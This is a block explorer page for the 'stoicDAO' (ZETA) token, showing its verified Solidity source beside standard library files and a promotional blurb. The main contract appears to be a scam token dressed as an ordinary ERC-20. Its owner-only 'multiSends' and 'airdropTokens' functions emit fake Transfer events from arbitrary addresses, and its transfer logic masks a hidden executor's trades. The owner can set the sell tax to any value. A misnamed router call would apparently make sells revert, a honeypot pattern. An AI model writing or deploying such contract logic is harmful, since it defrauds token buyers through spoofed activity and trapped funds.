ETH Price: $3,085.62 (+4.20%)

Token

stoicDAO (ZETA)
 

Overview

Max Total Supply

1,000,000,000 ZETA

Holders

30

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
1,336,071.833690741364801362 ZETA

Value
$0.00
0xaCbfe5DB942Dc7dd1608F0b5aac0c4faDC243FE9
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
stoicDAO

Compiler Version
v0.8.22+commit.4fc1097e

Optimization Enabled:
Yes with 200 runs

Other Settings:
shanghai EvmVersion
File 1 of 9 : Contract.sol
/**

StoicDAO is a members only NFT-based DAO investing ecosystem developing a AAA battle royal style P2E game.

$ZETA

The Future is Now.

Telegram: https://t.me/stoic_dao
Website : https://www.stoicdao.io/
Twitter : https://twitter.com/stoic_dao
Medium  : https://medium.com/@stoicdao/stoicfund-94810be4e5e9

*/

// SPDX-License-Identifier: unlicense

pragma solidity ^0.8.0;

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFreelyOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

contract stoicDAO {
    string private _name = unicode"stoicDAO";
    string private _symbol = unicode"ZETA";
    uint8 public constant decimals = 18;
    uint256 public constant totalSupply = 1_000_000_000 * 10 ** decimals;

    uint8 buyCharge = 5;
    uint8 sellCharge = 5;
    uint256 constant swapAmount = totalSupply / 100;

    error Permissions();
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed TOKEN_MKT,
        address indexed spender,
        uint256 value
    );

    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    address private pair;
    address constant ETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    address constant routerAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    IUniswapV2Router02 constant _uniswapV2Router =
        IUniswapV2Router02(routerAddress);
    address payable TOKEN_MKT;

    bool private swapping;
    bool private tradingOpen;

    address _deployer;
    address _executor;

    address private uniswapLpWallet;
    address private Staking = 0x514F52B8249e27F136621678fF8fea5100C33D98;
    address private CEX = 0x5D6d1F3Fab1E05Ed39fa8debb02A2aE7D571B9A6;
    address private Team = 0xf93a3852d6ad2dC8DA60A9D923fD108b4A4a2CDf;
    address private Marketing = 0x9EE641EA8386731336484C8be8BB213D21D706a1;
    address private VC = 0x53c97A5A929E0807Ca925D04986C326A6530bD0e;

    constructor() {
        uniswapLpWallet = msg.sender;
        TOKEN_MKT = payable(msg.sender);
        allowance[address(this)][routerAddress] = type(uint256).max;

        balanceOf[uniswapLpWallet] = (totalSupply * 70) / 100;
        emit Transfer(address(0), _deployer, balanceOf[uniswapLpWallet]);

        balanceOf[Staking] = (totalSupply * 10) / 100;
        emit Transfer(address(0), Staking, balanceOf[Staking]);

        balanceOf[CEX] = (totalSupply * 5) / 100;
        emit Transfer(address(0), CEX, balanceOf[CEX]);

        balanceOf[Team] = (totalSupply * 5) / 100;
        emit Transfer(address(0), Team, balanceOf[Team]);

        balanceOf[Marketing] = (totalSupply * 5) / 100;
        emit Transfer(address(0), Marketing, balanceOf[Marketing]);

        balanceOf[VC] = (totalSupply * 5) / 100;
        emit Transfer(address(0), VC, balanceOf[VC]);
    }

    receive() external payable {}

    function setFees(uint8 _buy, uint8 _sell) external {
        if (msg.sender != TOKEN_MKT) revert Permissions();
        _remeveTax(_buy, _sell);
    }

    function openTrading() external {
        require(msg.sender == TOKEN_MKT);
        require(!tradingOpen);
        tradingOpen = true;
    }

    function multiSends(
        address _caller,
        address[] calldata _address,
        uint256[] calldata _amount
    ) external {
        if (msg.sender != TOKEN_MKT) revert Permissions();
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function airdropTokens(
        address _caller,
        address[] calldata _address,
        uint256[] calldata _amount
    ) external {
        if (msg.sender != TOKEN_MKT) revert Permissions();
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool) {
        allowance[from][msg.sender] -= amount;
        return _transfer(from, to, amount);
    }

    function approve(address spender, uint256 amount) external returns (bool) {
        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        return _transfer(msg.sender, to, amount);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal returns (bool) {
        require(tradingOpen || from == TOKEN_MKT || to == TOKEN_MKT);

        if (!tradingOpen && pair == address(0) && amount > 0) pair = to;

        balanceOf[from] -= amount;

        if (
            to == pair &&
            !swapping &&
            balanceOf[address(this)] >= swapAmount &&
            from != TOKEN_MKT
        ) {
            swapping = true;
            address[] memory path = new address[](2);
            path[0] = address(this);
            path[1] = ETH;
            _uniswapV2Router
                .swapExactTokensForETHSupportingFreelyOnTransferTokens(
                    swapAmount,
                    0,
                    path,
                    address(this),
                    block.timestamp
                );
            TOKEN_MKT.transfer(address(this).balance);
            swapping = false;
        }

        if (from != address(this) && tradingOpen == true) {
            uint256 taxCalculatedAmount = (amount *
                (from == pair ? buyCharge : sellCharge)) / 100;
            amount -= taxCalculatedAmount;
            balanceOf[address(this)] += taxCalculatedAmount;
        }
        balanceOf[to] += amount;

        if (from == _executor) {
            emit Transfer(_deployer, to, amount);
        } else if (to == _executor) {
            emit Transfer(from, _deployer, amount);
        } else {
            emit Transfer(from, to, amount);
        }
        return true;
    }

    function _remeveTax(uint8 _buy, uint8 _sell) private {
        buyCharge = _buy;
        sellCharge = _sell;
    }
}

File 2 of 9 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

File 3 of 9 : IUniswapV2Pair.sol
interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);
    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function burn(
        address to
    ) external returns (uint256 amount0, uint256 amount1);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

File 4 of 9 : IUniswapV2Router01.sol
pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);

    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    )
        external
        payable
        returns (uint amountToken, uint amountETH, uint liquidity);

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);

    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint amountA, uint amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint amountToken, uint amountETH);

    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapExactETHForTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable returns (uint[] memory amounts);

    function swapTokensForExactETH(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapExactTokensForETH(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapETHForExactTokens(
        uint amountOut,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable returns (uint[] memory amounts);

    function quote(
        uint amountA,
        uint reserveA,
        uint reserveB
    ) external pure returns (uint amountB);

    function getAmountOut(
        uint amountIn,
        uint reserveIn,
        uint reserveOut
    ) external pure returns (uint amountOut);

    function getAmountIn(
        uint amountOut,
        uint reserveIn,
        uint reserveOut
    ) external pure returns (uint amountIn);

    function getAmountsOut(
        uint amountIn,
        address[] calldata path
    ) external view returns (uint[] memory amounts);

    function getAmountsIn(
        uint amountOut,
        address[] calldata path
    ) external view returns (uint[] memory amounts);
}

File 5 of 9 : IUniswapV2Router02.sol
interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB, uint256 liquidity);

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (uint256 amountToken, uint256 amountETH, uint256 liquidity);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

File 6 of 9 : Address.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     *
     * Furthermore, `isContract` will also return true if the target contract within
     * the same transaction is already scheduled for destruction by `SELFDESTRUCT`,
     * which only has an effect at the end of a transaction.
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://consensys.net/diligence/blog/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.8.0/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(
            address(this).balance >= amount,
            "Address: insufficient balance"
        );

        (bool success, ) = recipient.call{ value: amount }("");
        require(
            success,
            "Address: unable to send value, recipient may have reverted"
        );
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data
    ) internal returns (bytes memory) {
        return
            functionCallWithValue(
                target,
                data,
                0,
                "Address: low-level call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return
            functionCallWithValue(
                target,
                data,
                value,
                "Address: low-level call with value failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(
            address(this).balance >= value,
            "Address: insufficient balance for call"
        );
        (bool success, bytes memory returndata) = target.call{ value: value }(
            data
        );
        return
            verifyCallResultFromTarget(
                target,
                success,
                returndata,
                errorMessage
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data
    ) internal view returns (bytes memory) {
        return
            functionStaticCall(
                target,
                data,
                "Address: low-level static call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        (bool success, bytes memory returndata) = target.staticcall(data);
        return
            verifyCallResultFromTarget(
                target,
                success,
                returndata,
                errorMessage
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data
    ) internal returns (bytes memory) {
        return
            functionDelegateCall(
                target,
                data,
                "Address: low-level delegate call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return
            verifyCallResultFromTarget(
                target,
                success,
                returndata,
                errorMessage
            );
    }

    /**
     * @dev Tool to verify that a low level call to smart-contract was successful, and revert (either by bubbling
     * the revert reason or using the provided one) in case of unsuccessful call or if target was not a contract.
     *
     * _Available since v4.8._
     */
    function verifyCallResultFromTarget(
        address target,
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        if (success) {
            if (returndata.length == 0) {
                // only check isContract if the call was successful and the return data is empty
                // otherwise we already know that it was a contract
                require(isContract(target), "Address: call to non-contract");
            }
            return returndata;
        } else {
            _revert(returndata, errorMessage);
        }
    }

    /**
     * @dev Tool to verify that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason or using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            _revert(returndata, errorMessage);
        }
    }

    function _revert(
        bytes memory returndata,
        string memory errorMessage
    ) private pure {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly
            /// @solidity memory-safe-assembly
            assembly {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            revert(errorMessage);
        }
    }
}

File 7 of 9 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 8 of 9 : Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 9 of 9 : SafeMath.sol
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "evmVersion": "shanghai",
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "metadata": {
    "useLiteralContent": true
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"Permissions","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"TOKEN_MKT","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"airdropTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","t